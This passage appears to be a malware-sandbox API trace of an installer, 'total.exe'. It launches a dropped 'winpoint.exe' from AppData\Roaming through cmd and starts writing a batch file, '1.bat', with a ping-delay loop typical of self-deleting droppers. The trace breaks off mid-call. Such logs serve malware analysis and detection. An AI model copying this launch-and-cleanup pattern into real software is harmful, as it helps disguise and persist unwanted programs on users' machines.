(lpLibFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x756f0000 [0159.711] GetProcAddress (hModule=0x756f0000, lpProcName="Exec") returned 0x756f1000 [0159.712] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0159.712] GetProcAddress (hModule=0x75c90000, lpProcName="IsWow64Process") returned 0x75ca195e [0159.712] GetCurrentProcess () returned 0xffffffff [0159.712] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18f964 | out: Wow64Process=0x18f964) returned 1 [0159.712] lstrcpyA (in: lpString1=0x3369a8, lpString2="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" | out: lpString1="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"") returned="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"" [0159.712] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x18fb44, dwRevision=0x1 | out: pSecurityDescriptor=0x18fb44) returned 1 [0159.712] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x18fb44, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x18fb44) returned 1 [0159.712] CreatePipe (in: hReadPipe=0x18fb98, hWritePipe=0x18fb8c, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb98*=0x19c, hWritePipe=0x18fb8c*=0x1a0) returned 1 [0159.712] CreatePipe (in: hReadPipe=0x18fb7c, hWritePipe=0x18fb90, lpPipeAttributes=0x18fb68, nSize=0x0 | out: hReadPipe=0x18fb7c*=0x194, hWritePipe=0x18fb90*=0x198) returned 1 [0159.713] GetStartupInfoA (in: lpStartupInfo=0x18fb00 | out: lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0159.713] 
CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fb00*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x198, hStdOutput=0x1a0, hStdError=0x1a0), lpProcessInformation=0x18fb58 | out: lpCommandLine="cmd /c start \"\" \"C:\\Users\\aDU0VK IWA5kLS\\AppData\\Roaming\\winpoint.exe\"", lpProcessInformation=0x18fb58*(hProcess=0x1a4, hThread=0x1a8, dwProcessId=0x890, dwThreadId=0x894)) returned 1 [0159.737] GetTickCount () returned 0x3050e [0159.737] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0159.737] Sleep (dwMilliseconds=0x64) [0160.307] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x102 [0160.307] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0160.307] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.307] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.307] Sleep (dwMilliseconds=0x64) [0160.415] 
WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x102 [0160.415] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x103) returned 1 [0160.415] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.415] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.415] Sleep (dwMilliseconds=0x64) [0160.526] WaitForSingleObject (hHandle=0x1a4, dwMilliseconds=0x0) returned 0x0 [0160.526] GetExitCodeProcess (in: hProcess=0x1a4, lpExitCode=0x18fb84 | out: lpExitCode=0x18fb84*=0x0) returned 1 [0160.526] PeekNamedPipe (in: hNamedPipe=0x19c, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x18fba0*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0160.526] wsprintfA (in: param_1=0x18fa80, param_2="%d" | out: param_1="0") returned 1 [0160.526] lstrcpynA (in: lpString1=0x336564, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0160.526] CloseHandle (hObject=0x1a8) returned 1 [0160.526] CloseHandle (hObject=0x1a4) returned 1 [0160.526] CloseHandle (hObject=0x1a0) returned 1 [0160.526] CloseHandle (hObject=0x19c) returned 1 [0160.526] CloseHandle (hObject=0x198) returned 1 [0160.526] CloseHandle (hObject=0x194) returned 1 [0160.527] OleUninitialize () [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" 
[0160.527] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.527] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 46 [0160.527] lstrcpynA (in: lpString1=0x433400, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.527] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.527] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.527] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.527] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.528] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: 
lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: lpString1=0x3369ac, lpString2="kernel32::GetShortPathName(t R3, t.R3,i 1024)", iMaxLength=1024 | out: lpString1="kernel32::GetShortPathName(t R3, t.R3,i 1024)") returned="kernel32::GetShortPathName(t R3, t.R3,i 1024)" [0160.528] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.528] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.528] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.528] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.528] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.529] lstrcpyA (in: lpString1=0x3401e0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.529] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.529] lstrcpyA (in: lpString1=0x33e508, lpString2="GetShortPathName" | out: lpString1="GetShortPathName") returned="GetShortPathName" [0160.529] lstrcpynA (in: lpString1=0x3401e0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.529] lstrcpynA (in: lpString1=0x340df8, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.529] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.529] GetShortPathNameA (in: lpszLongPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", lpszShortPath=0x3409f0, cchBuffer=0x400 | out: lpszShortPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned 0x2e [0160.529] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0160.529] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpyA (in: lpString1=0x433400, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe" [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.530] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x3369ac, lpString2="kernel32::GetTempPathA(i 1024, t .R0) i .r2", iMaxLength=1024 | out: lpString1="kernel32::GetTempPathA(i 1024, t .R0) i .r2") returned="kernel32::GetTempPathA(i 1024, t .R0) i .r2" [0160.530] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 
returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.530] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.530] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.531] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.531] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.531] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.531] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.531] lstrcpyA (in: lpString1=0x33e508, lpString2="GetTempPathA" | out: lpString1="GetTempPathA") returned="GetTempPathA" [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] lstrcpynA (in: lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.531] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x340df8 | out: lpBuffer="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0160.531] lstrcpynA (in: lpString1=0x3409f0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.531] lstrcpyA (in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" 
[0160.531] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="1024") returned 4 [0160.532] wsprintfA (in: param_1=0x3409f0, param_2="%d" | out: param_1="37") returned 2 [0160.532] lstrcpyA (in: lpString1=0x430800, lpString2="37" | out: lpString1="37") returned="37" [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.532] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x3369ac, 
lpString2="kernel32::GetShortPathName(t R0, t.R0,i 1024)", iMaxLength=1024 | out: lpString1="kernel32::GetShortPathName(t R0, t.R0,i 1024)") returned="kernel32::GetShortPathName(t R0, t.R0,i 1024)" [0160.532] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0160.532] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0160.532] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0160.533] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0160.533] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0160.533] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.533] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0160.533] lstrcpyA (in: lpString1=0x33e508, lpString2="GetShortPathName" | out: lpString1="GetShortPathName") returned="GetShortPathName" [0160.533] lstrcpynA (in: lpString1=0x340df8, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.533] lstrcpynA (in: lpString1=0x3409f0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.533] lstrcpynA (in: 
lpString1=0x340df8, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0160.533] GetShortPathNameA (in: lpszLongPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", lpszShortPath=0x3401e0, cchBuffer=0x400 | out: lpszShortPath="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 0x25 [0160.534] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="1024") returned 4 [0160.534] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpyA (in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpynA (in: lpString1=0x341200, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\") returned 37 [0160.534] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.534] lstrcpynA 
(in: lpString1=0x432800, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.534] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned 42 [0160.534] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\1.bat" [0160.535] wsprintfA (in: param_1=0x432c00, param_2="%d" | out: param_1="404") returned 3 [0160.535] lstrcpynA (in: lpString1=0x40a818, lpString2=":try\r\n", iMaxLength=1024 | out: lpString1=":try\r\n") returned=":try\r\n" [0160.535] lstrlenA (lpString=":try\r\n") returned 6 [0160.535] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x6, lpOverlapped=0x0) returned 1 [0160.536] lstrcpynA (in: lpString1=0x40a818, lpString2="ping localhost -n 2 >NUL\r\n", iMaxLength=1024 | out: lpString1="ping localhost -n 2 >NUL\r\n") returned="ping localhost -n 2 >NUL\r\n" [0160.536] lstrlenA (lpString="ping localhost -n 2 >NUL\r\n") returned 26 [0160.536] WriteFile (in: hFile=0x194, lpBuffer=0x40a818*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x18fbd8, lpOverlapped=0x0 | out: lpBuffer=0x40a818*, lpNumberOfBytesWritten=0x18fbd8*=0x1a, lpOverlapped=0x0) returned 1 [0160.536] lstrcpynA (in: lpString1=0x42e3a4, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\total.exe", iMaxLength=1024 | out: 
